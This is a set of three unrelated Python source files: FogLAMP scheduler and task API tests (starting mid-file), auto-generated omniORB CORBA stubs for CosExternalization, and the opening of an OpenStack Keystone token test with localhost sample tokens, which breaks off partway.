elif _type == 2:
schedule = TimedSchedule()
schedule.repeat = None
schedule.time = datetime(1, 1, 1, 0, 0, 10)
schedule.day = 1
elif _type == 3:
schedule = IntervalSchedule()
schedule.repeat = timedelta(seconds=15)
schedule.time = None
schedule.day = None
else:
schedule = ManualSchedule()
schedule.repeat = None
schedule.time = None
schedule.day = None
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
return schedule
storage_client_mock = MagicMock(StorageClientAsync)
response = {'rows': [{'name': 'p1'}], 'count': 1}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'save_schedule', return_value=mock_coro()) \
as patch_save_schedule:
with patch.object(server.Server.scheduler, 'get_schedule',
return_value=mock_schedule(request_data["type"])) as patch_get_schedule:
resp = await client.post('/foglamp/schedule', data=json.dumps(request_data))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert expected_response == json_response
patch_get_schedule.called_once_with()
patch_save_schedule.called_once_with()
async def test_post_schedule_bad_param(self, client):
resp = await client.post('/foglamp/schedule', data=json.dumps({'schedule_id': 'bla'}))
assert 400 == resp.status
assert 'Schedule ID not needed for new Schedule.' == resp.reason
@pytest.mark.parametrize("request_data, response_code, error_message, storage_return", [
({"type": 'bla'}, 400, "Error in type: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"day": 'bla'}, 400, "Error in day: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"time": 'bla'}, 400, "Error in time: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"repeat": 'bla'}, 400, "Error in repeat: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Schedule time cannot be empty for TIMED schedule. 1",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 9, "time": 1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Day must either be None or must be an integer and in range 1-7. 1",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 5, "time": -1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Time must be an integer and in range 0-86399. 1",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 200}, 400,
"Errors in request: Schedule type error: 200,Schedule name and Process name cannot be empty. 2",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 1, "name": "sch1", "process_name": "p1"}, 404,
"No such Scheduled Process name: p1",
{'rows': [], 'count': 0}),
])
async def test_post_schedule_bad_data(self, client, request_data, response_code, error_message, storage_return):
storage_client_mock = MagicMock(StorageClientAsync)
response = storage_return
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
resp = await client.post('/foglamp/schedule', data=json.dumps(request_data))
assert response_code == resp.status
assert error_message == resp.reason
@pytest.mark.parametrize("request_data, expected_response", [
({"name": "new"},
{'schedule': {'id': '{}'.format(_random_uuid), 'time': 0, 'processName': 'bar', 'repeat': 30.0,
'exclusive': True, 'enabled': True, 'type': 'STARTUP', 'day': None, 'name': 'new'}}),
])
async def test_update_schedule(self, client, request_data, expected_response):
async def mock_coro():
return ""
async def mock_schedule(*args):
schedule = StartUpSchedule()
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
if args[0] == 1:
schedule.name = "foo"
else:
schedule.name = "new"
return schedule
storage_client_mock = MagicMock(StorageClientAsync)
response = {'rows': [{'name': 'p1'}], 'count': 1}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'save_schedule', return_value=mock_coro()) \
as patch_save_schedule:
with patch.object(server.Server.scheduler, 'get_schedule',
side_effect=mock_schedule) as patch_get_schedule:
resp = await client.put('/foglamp/schedule/{}'.format(self._random_uuid),
data=json.dumps(request_data))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert expected_response == json_response
assert 2 == patch_get_schedule.call_count
assert call(uuid.UUID(str(self._random_uuid))) == patch_get_schedule.call_args
arguments, kwargs = patch_save_schedule.call_args
assert isinstance(arguments[0], StartUpSchedule)
async def test_update_schedule_bad_param(self, client):
resp = await client.put('/foglamp/schedule/{}'.format("bla"), data=json.dumps({"a": 1}))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
async def test_update_schedule_data_not_exist(self, client):
async def mock_coro():
return ""
with patch.object(server.Server.scheduler, 'get_schedule',
return_value=mock_coro()) as patch_get_schedule:
resp = await client.put('/foglamp/schedule/{}'.format(self._random_uuid), data=json.dumps({"a": 1}))
assert 404 == resp.status
assert 'Schedule not found: {}'.format(self._random_uuid) == resp.reason
patch_get_schedule.assert_called_once_with(uuid.UUID('{}'.format(self._random_uuid)))
@pytest.mark.parametrize("request_data, response_code, error_message, storage_return", [
({"type": 'bla'}, 400, "Error in type: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"day": 'bla'}, 400, "Error in day: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"time": 'bla'}, 400, "Error in time: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"repeat": 'bla'}, 400, "Error in repeat: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Schedule time cannot be empty for TIMED schedule.",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 9, "time": 1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Day must either be None or must be an integer and in range 1-7.",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 5, "time": -1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Time must be an integer and in range 0-86399.",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 200}, 400,
"Errors in request: Schedule type error: 200",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 1, "name": "sch1", "process_name": "p1"}, 404,
"No such Scheduled Process name: p1",
{'rows': [], 'count': 0}),
])
async def test_update_schedule_bad_data(self, client, request_data, response_code, error_message, storage_return):
async def mock_coro():
schedule = StartUpSchedule()
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
return schedule
storage_client_mock = MagicMock(StorageClientAsync)
response = storage_return
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_schedule',
return_value=mock_coro()) as patch_get_schedule:
resp = await client.put('/foglamp/schedule/{}'.format(self._random_uuid),
data=json.dumps(request_data))
assert response_code == resp.status
assert error_message == resp.reason
patch_get_schedule.assert_called_once_with(uuid.UUID(str(self._random_uuid)))
async def test_delete_schedule(self, client):
async def mock_coro():
return True, "Schedule deleted successfully."
with patch.object(server.Server.scheduler, 'delete_schedule', return_value=mock_coro()):
resp = await client.delete('/foglamp/schedule/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'id': '{}'.format(self._random_uuid),
'message': 'Schedule deleted successfully.'} == json_response
async def test_delete_schedule_bad_data(self, client):
resp = await client.delete('/foglamp/schedule/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(NotReadyError(), 404, ''),
(ValueError, 404, ''),
(RuntimeWarning, 409, "Enabled Schedule {} cannot be deleted.".format(str(_random_uuid))),
])
async def test_delete_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'delete_schedule', side_effect=exception_name):
resp = await client.delete('/foglamp/schedule/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_schedule_type(self, client):
resp = await client.get('/foglamp/schedule/type')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'scheduleType': [{'name': 'STARTUP', 'index': 1},
{'name': 'TIMED', 'index': 2},
{'name': 'INTERVAL', 'index': 3},
{'name': 'MANUAL', 'index': 4}]} == json_response
class TestTasks:
_random_uuid = uuid.uuid4()
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
def setup_method(self):
server.Server.scheduler = Scheduler(None, None)
def teardown_method(self):
server.Server.scheduler = None
async def test_get_task(self, client):
async def mock_coro():
task = Task()
task.task_id = self._random_uuid
task.state = Task.State.RUNNING
task.start_time = None
task.schedule_name = "bar"
task.process_name = "bar"
task.end_time = None
task.exit_code = 0
task.reason = None
return task
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 1, 'rows': [{'process_name': 'bla'}]}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_task', return_value=mock_coro()):
resp = await client.get('/foglamp/task/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'startTime': 'None', 'reason': None,
'endTime': 'None', 'state': 'Running',
'name': 'bar', 'processName': 'bar', 'exitCode': 0,
'id': '{}'.format(self._random_uuid)} == json_response
async def test_get_task_bad_data(self, client):
resp = await client.get('/foglamp/task/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Task ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(TaskNotFoundError(_random_uuid), 404, 'Task not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_get_task_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'get_task', side_effect=exception_name):
resp = await client.get('/foglamp/task/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
@pytest.mark.parametrize("request_params", [
'',
'?limit=1',
'?name=bla',
'?state=running',
'?limit=1&name=bla&state=running',
])
async def test_get_tasks(self, client, request_params):
async def patch_get_tasks():
tasks = []
task = Task()
task.task_id = self._random_uuid
task.state = Task.State.RUNNING
task.start_time = None
task.schedule_name = "bla"
task.process_name = "bla"
task.end_time = None
task.exit_code = 0
task.reason = None
tasks.append(task)
return tasks
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 1, 'rows': [{'process_name': 'bla'}]}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_tasks', return_value=patch_get_tasks()):
resp = await client.get('/foglamp/task{}'.format(request_params))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'tasks': [{'state': 'Running', 'id': '{}'.format(self._random_uuid),
'endTime': 'None', 'exitCode': 0,
'startTime': 'None', 'reason': None, 'name': 'bla', 'processName': 'bla'}]} == json_response
@pytest.mark.parametrize("request_params, response_code, response_message", [
('?limit=invalid', 400, "Limit must be a positive integer"),
('?limit=-1', 400, "Limit must be a positive integer"),
('?state=BLA', 400, "This state value 'BLA' not permitted."),
])
async def test_get_tasks_exceptions(self, client, request_params, response_code, response_message):
resp = await client.get('/foglamp/task{}'.format(request_params))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_tasks_no_task_exception(self, client):
async def patch_get_tasks():
tasks = []
return tasks
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 0, 'rows': []}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_tasks', return_value=patch_get_tasks()):
resp = await client.get('/foglamp/task{}'.format('?name=bla&state=running'))
assert 404 == resp.status
assert "No Tasks found" == resp.reason
@pytest.mark.parametrize("request_params", ['', '?name=bla'])
async def test_get_tasks_latest(self, client, request_params):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 2, 'rows': [
{'pid': '1', 'reason': '', 'exit_code': '0', 'id': '1',
'process_name': 'bla', 'schedule_name': 'bla', 'end_time': '2018', 'start_time': '2018', 'state': '2'}]}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
resp = await client.get('/foglamp/task/latest{}'.format(request_params))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'tasks': [{'reason': '', 'name': 'bla', 'processName': 'bla',
'state': 'Complete', 'exitCode': '0', 'endTime': '2018',
'pid': '1', 'startTime': '2018', 'id': '1'}]} == json_response
@pytest.mark.parametrize("request_params", ['', '?name=not_exist'])
async def test_get_tasks_latest_no_task_exception(self, client, request_params):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 0, 'rows': []}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
resp = await client.get('/foglamp/task/latest{}'.format(request_params))
assert 404 == resp.status
assert "No Tasks found" == resp.reason
async def test_cancel_task(self, client):
async def mock_coro():
return "some valid values"
with patch.object(server.Server.scheduler, 'get_task', return_value=mock_coro()):
with patch.object(server.Server.scheduler, 'cancel_task', return_value=mock_coro()):
resp = await client.put('/foglamp/task/{}/cancel'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'id': '{}'.format(self._random_uuid),
'message': 'Task cancelled successfully'} == json_response
async def test_cancel_task_bad_data(self, client):
resp = await client.put('/foglamp/task/{}/cancel'.format("bla"))
assert 404 == resp.status
assert 'Invalid Task ID {}'.format("bla") == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(TaskNotFoundError(_random_uuid), 404, 'Task not found: {}'.format(_random_uuid)),
(TaskNotRunningError(_random_uuid), 404, 'Task is not running: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_cancel_task_exceptions(self, client, exception_name, response_code, response_message):
async def mock_coro():
return ""
with patch.object(server.Server.scheduler, 'get_task', return_value=mock_coro()):
with patch.object(server.Server.scheduler, 'cancel_task', side_effect=exception_name):
resp = await client.put('/foglamp/task/{}/cancel'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_task_state(self, client):
resp = await client.get('/foglamp/task/state')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'taskState': [
{'name': 'Running', 'index': 1},
{'name': 'Complete', 'index': 2},
{'name': 'Canceled', 'index': 3},
{'name': 'Interrupted', 'index': 4}]} == json_response
|
|
# Python stubs generated by omniidl from /usr/local/share/idl/omniORB/COS/CosExternalization.idl
# DO NOT EDIT THIS FILE!
import omniORB, _omnipy
from omniORB import CORBA, PortableServer
_0_CORBA = CORBA
_omnipy.checkVersion(4,2, __file__, 1)
try:
property
except NameError:
def property(*args):
return None
# #include "CosNaming.idl"
import CosNaming_idl
_0_CosNaming = omniORB.openModule("CosNaming")
_0_CosNaming__POA = omniORB.openModule("CosNaming__POA")
# #include "CosLifeCycle.idl"
import CosLifeCycle_idl
_0_CosLifeCycle = omniORB.openModule("CosLifeCycle")
_0_CosLifeCycle__POA = omniORB.openModule("CosLifeCycle__POA")
# #include "CosObjectIdentity.idl"
import CosObjectIdentity_idl
_0_CosObjectIdentity = omniORB.openModule("CosObjectIdentity")
_0_CosObjectIdentity__POA = omniORB.openModule("CosObjectIdentity__POA")
# #include "corbaidl.idl"
import corbaidl_idl
_0_CORBA = omniORB.openModule("CORBA")
_0_CORBA__POA = omniORB.openModule("CORBA__POA")
# #include "boxes.idl"
import boxes_idl
_0_CORBA = omniORB.openModule("CORBA")
_0_CORBA__POA = omniORB.openModule("CORBA__POA")
# #include "ir.idl"
import ir_idl
_0_CORBA = omniORB.openModule("CORBA")
_0_CORBA__POA = omniORB.openModule("CORBA__POA")
# #include "CosRelationships.idl"
import CosRelationships_idl
_0_CosRelationships = omniORB.openModule("CosRelationships")
_0_CosRelationships__POA = omniORB.openModule("CosRelationships__POA")
# #include "CosGraphs.idl"
import CosGraphs_idl
_0_CosGraphs = omniORB.openModule("CosGraphs")
_0_CosGraphs__POA = omniORB.openModule("CosGraphs__POA")
# #include "CosStream.idl"
import CosStream_idl
_0_CosStream = omniORB.openModule("CosStream")
_0_CosStream__POA = omniORB.openModule("CosStream__POA")
#
# Start of module "CosExternalization"
#
__name__ = "CosExternalization"
_0_CosExternalization = omniORB.openModule("CosExternalization", r"/usr/local/share/idl/omniORB/COS/CosExternalization.idl")
_0_CosExternalization__POA = omniORB.openModule("CosExternalization__POA", r"/usr/local/share/idl/omniORB/COS/CosExternalization.idl")
# exception InvalidFileNameError
_0_CosExternalization.InvalidFileNameError = omniORB.newEmptyClass()
class InvalidFileNameError (CORBA.UserException):
_NP_RepositoryId = "IDL:omg.org/CosExternalization/InvalidFileNameError:1.0"
def __init__(self):
CORBA.UserException.__init__(self)
_0_CosExternalization.InvalidFileNameError = InvalidFileNameError
_0_CosExternalization._d_InvalidFileNameError = (omniORB.tcInternal.tv_except, InvalidFileNameError, InvalidFileNameError._NP_RepositoryId, "InvalidFileNameError")
_0_CosExternalization._tc_InvalidFileNameError = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_InvalidFileNameError)
omniORB.registerType(InvalidFileNameError._NP_RepositoryId, _0_CosExternalization._d_InvalidFileNameError, _0_CosExternalization._tc_InvalidFileNameError)
del InvalidFileNameError
# exception ContextAlreadyRegistered
_0_CosExternalization.ContextAlreadyRegistered = omniORB.newEmptyClass()
class ContextAlreadyRegistered (CORBA.UserException):
_NP_RepositoryId = "IDL:omg.org/CosExternalization/ContextAlreadyRegistered:1.0"
def __init__(self):
CORBA.UserException.__init__(self)
_0_CosExternalization.ContextAlreadyRegistered = ContextAlreadyRegistered
_0_CosExternalization._d_ContextAlreadyRegistered = (omniORB.tcInternal.tv_except, ContextAlreadyRegistered, ContextAlreadyRegistered._NP_RepositoryId, "ContextAlreadyRegistered")
_0_CosExternalization._tc_ContextAlreadyRegistered = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_ContextAlreadyRegistered)
omniORB.registerType(ContextAlreadyRegistered._NP_RepositoryId, _0_CosExternalization._d_ContextAlreadyRegistered, _0_CosExternalization._tc_ContextAlreadyRegistered)
del ContextAlreadyRegistered
# interface Stream
_0_CosExternalization._d_Stream = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosExternalization/Stream:1.0", "Stream")
omniORB.typeMapping["IDL:omg.org/CosExternalization/Stream:1.0"] = _0_CosExternalization._d_Stream
_0_CosExternalization.Stream = omniORB.newEmptyClass()
class Stream (_0_CosLifeCycle.LifeCycleObject):
_NP_RepositoryId = _0_CosExternalization._d_Stream[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosExternalization.Stream = Stream
_0_CosExternalization._tc_Stream = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_Stream)
omniORB.registerType(Stream._NP_RepositoryId, _0_CosExternalization._d_Stream, _0_CosExternalization._tc_Stream)
# Stream operations and attributes
Stream._d_externalize = ((omniORB.typeMapping["IDL:omg.org/CosStream/Streamable:1.0"], ), (), None)
Stream._d_internalize = ((omniORB.typeMapping["IDL:omg.org/CosLifeCycle/FactoryFinder:1.0"], ), (omniORB.typeMapping["IDL:omg.org/CosStream/Streamable:1.0"], ), {_0_CosLifeCycle.NoFactory._NP_RepositoryId: _0_CosLifeCycle._d_NoFactory, _0_CosStream.StreamDataFormatError._NP_RepositoryId: _0_CosStream._d_StreamDataFormatError})
Stream._d_begin_context = ((), (), {_0_CosExternalization.ContextAlreadyRegistered._NP_RepositoryId: _0_CosExternalization._d_ContextAlreadyRegistered})
Stream._d_end_context = ((), (), None)
Stream._d_flush = ((), (), None)
# Stream object reference
class _objref_Stream (_0_CosLifeCycle._objref_LifeCycleObject):
_NP_RepositoryId = Stream._NP_RepositoryId
def __init__(self, obj):
_0_CosLifeCycle._objref_LifeCycleObject.__init__(self, obj)
def externalize(self, *args):
return self._obj.invoke("externalize", _0_CosExternalization.Stream._d_externalize, args)
def internalize(self, *args):
return self._obj.invoke("internalize", _0_CosExternalization.Stream._d_internalize, args)
def begin_context(self, *args):
return self._obj.invoke("begin_context", _0_CosExternalization.Stream._d_begin_context, args)
def end_context(self, *args):
return self._obj.invoke("end_context", _0_CosExternalization.Stream._d_end_context, args)
def flush(self, *args):
return self._obj.invoke("flush", _0_CosExternalization.Stream._d_flush, args)
omniORB.registerObjref(Stream._NP_RepositoryId, _objref_Stream)
_0_CosExternalization._objref_Stream = _objref_Stream
del Stream, _objref_Stream
# Stream skeleton
__name__ = "CosExternalization__POA"
class Stream (_0_CosLifeCycle__POA.LifeCycleObject):
_NP_RepositoryId = _0_CosExternalization.Stream._NP_RepositoryId
_omni_op_d = {"externalize": _0_CosExternalization.Stream._d_externalize, "internalize": _0_CosExternalization.Stream._d_internalize, "begin_context": _0_CosExternalization.Stream._d_begin_context, "end_context": _0_CosExternalization.Stream._d_end_context, "flush": _0_CosExternalization.Stream._d_flush}
_omni_op_d.update(_0_CosLifeCycle__POA.LifeCycleObject._omni_op_d)
Stream._omni_skeleton = Stream
_0_CosExternalization__POA.Stream = Stream
omniORB.registerSkeleton(Stream._NP_RepositoryId, Stream)
del Stream
__name__ = "CosExternalization"
# interface StreamFactory
_0_CosExternalization._d_StreamFactory = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosExternalization/StreamFactory:1.0", "StreamFactory")
omniORB.typeMapping["IDL:omg.org/CosExternalization/StreamFactory:1.0"] = _0_CosExternalization._d_StreamFactory
_0_CosExternalization.StreamFactory = omniORB.newEmptyClass()
class StreamFactory :
_NP_RepositoryId = _0_CosExternalization._d_StreamFactory[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosExternalization.StreamFactory = StreamFactory
_0_CosExternalization._tc_StreamFactory = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_StreamFactory)
omniORB.registerType(StreamFactory._NP_RepositoryId, _0_CosExternalization._d_StreamFactory, _0_CosExternalization._tc_StreamFactory)
# StreamFactory operations and attributes
StreamFactory._d_create = ((), (omniORB.typeMapping["IDL:omg.org/CosExternalization/Stream:1.0"], ), None)
# StreamFactory object reference
class _objref_StreamFactory (CORBA.Object):
_NP_RepositoryId = StreamFactory._NP_RepositoryId
def __init__(self, obj):
CORBA.Object.__init__(self, obj)
def create(self, *args):
return self._obj.invoke("create", _0_CosExternalization.StreamFactory._d_create, args)
omniORB.registerObjref(StreamFactory._NP_RepositoryId, _objref_StreamFactory)
_0_CosExternalization._objref_StreamFactory = _objref_StreamFactory
del StreamFactory, _objref_StreamFactory
# StreamFactory skeleton
__name__ = "CosExternalization__POA"
class StreamFactory (PortableServer.Servant):
_NP_RepositoryId = _0_CosExternalization.StreamFactory._NP_RepositoryId
_omni_op_d = {"create": _0_CosExternalization.StreamFactory._d_create}
StreamFactory._omni_skeleton = StreamFactory
_0_CosExternalization__POA.StreamFactory = StreamFactory
omniORB.registerSkeleton(StreamFactory._NP_RepositoryId, StreamFactory)
del StreamFactory
__name__ = "CosExternalization"
# interface FileStreamFactory
_0_CosExternalization._d_FileStreamFactory = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosExternalization/FileStreamFactory:1.0", "FileStreamFactory")
omniORB.typeMapping["IDL:omg.org/CosExternalization/FileStreamFactory:1.0"] = _0_CosExternalization._d_FileStreamFactory
_0_CosExternalization.FileStreamFactory = omniORB.newEmptyClass()
class FileStreamFactory :
_NP_RepositoryId = _0_CosExternalization._d_FileStreamFactory[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosExternalization.FileStreamFactory = FileStreamFactory
_0_CosExternalization._tc_FileStreamFactory = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_FileStreamFactory)
omniORB.registerType(FileStreamFactory._NP_RepositoryId, _0_CosExternalization._d_FileStreamFactory, _0_CosExternalization._tc_FileStreamFactory)
# FileStreamFactory operations and attributes
FileStreamFactory._d_create = (((omniORB.tcInternal.tv_string,0), ), (omniORB.typeMapping["IDL:omg.org/CosExternalization/Stream:1.0"], ), {_0_CosExternalization.InvalidFileNameError._NP_RepositoryId: _0_CosExternalization._d_InvalidFileNameError})
# FileStreamFactory object reference
class _objref_FileStreamFactory (CORBA.Object):
_NP_RepositoryId = FileStreamFactory._NP_RepositoryId
def __init__(self, obj):
CORBA.Object.__init__(self, obj)
def create(self, *args):
return self._obj.invoke("create", _0_CosExternalization.FileStreamFactory._d_create, args)
omniORB.registerObjref(FileStreamFactory._NP_RepositoryId, _objref_FileStreamFactory)
_0_CosExternalization._objref_FileStreamFactory = _objref_FileStreamFactory
del FileStreamFactory, _objref_FileStreamFactory
# FileStreamFactory skeleton
__name__ = "CosExternalization__POA"
class FileStreamFactory (PortableServer.Servant):
_NP_RepositoryId = _0_CosExternalization.FileStreamFactory._NP_RepositoryId
_omni_op_d = {"create": _0_CosExternalization.FileStreamFactory._d_create}
FileStreamFactory._omni_skeleton = FileStreamFactory
_0_CosExternalization__POA.FileStreamFactory = FileStreamFactory
omniORB.registerSkeleton(FileStreamFactory._NP_RepositoryId, FileStreamFactory)
del FileStreamFactory
__name__ = "CosExternalization"
#
# End of module "CosExternalization"
#
__name__ = "CosExternalization_idl"
_exported_modules = ( "CosExternalization", )
# The end.
|
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from keystone import config
from keystone import exception
from keystone.openstack.common import timeutils
from keystone import tests
from keystone.tests import default_fixtures
from keystone import token
from keystone.token.providers import pki
CONF = config.CONF
FUTURE_DELTA = datetime.timedelta(seconds=CONF.token.expiration)
CURRENT_DATE = timeutils.utcnow()
SAMPLE_V2_TOKEN = {
"access": {
"trust": {
"id": "abc123",
"trustee_user_id": "123456"
},
"serviceCatalog": [
{
"endpoints": [
{
"adminURL": "http://localhost:8774/v1.1/01257",
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"internalURL": "http://localhost:8774/v1.1/01257",
"publicURL": "http://localhost:8774/v1.1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "nova",
"type": "compute"
},
{
"endpoints": [
{
"adminURL": "http://localhost:9292",
"id": "aaa17a539e364297a7845d67c7c7cc4b",
"internalURL": "http://localhost:9292",
"publicURL": "http://localhost:9292",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "glance",
"type": "image"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8776/v1/01257",
"id": "077d82df25304abeac2294004441db5a",
"internalURL": "http://localhost:8776/v1/01257",
"publicURL": "http://localhost:8776/v1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "volume",
"type": "volume"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8773/services/Admin",
"id": "b06997fd08414903ad458836efaa9067",
"internalURL": "http://localhost:8773/services/Cloud",
"publicURL": "http://localhost:8773/services/Cloud",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "ec2",
"type": "ec2"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8080/v1",
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"internalURL": "http://localhost:8080/v1/AUTH_01257",
"publicURL": "http://localhost:8080/v1/AUTH_01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "swift",
"type": "object-store"
},
{
"endpoints": [
{
"adminURL": "http://localhost:35357/v2.0",
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"internalURL": "http://localhost:5000/v2.0",
"publicURL": "http://localhost:5000/v2.0",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "keystone",
"type": "identity"
}
],
"token": {
"expires": "2013-05-22T00:02:43.941430Z",
"id": "ce4fc2d36eea4cc9a36e666ac2f1029a",
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
},
"user": {
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova",
"roles": [
{
"name": "_member_"
},
{
"name": "admin"
}
],
"roles_links": [],
"username": "nova"
}
}
}
SAMPLE_V3_TOKEN = {
"token": {
"catalog": [
{
"endpoints": [
{
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:35357/v2.0"
},
{
"id": "446e244b75034a9ab4b0811e82d0b7c8",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
},
{
"id": "47fa3d9f499240abb5dfcf2668f168cd",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
}
],
"id": "26d7541715a44a4d9adad96f9872b633",
"type": "identity",
},
{
"endpoints": [
{
"id": "aaa17a539e364297a7845d67c7c7cc4b",
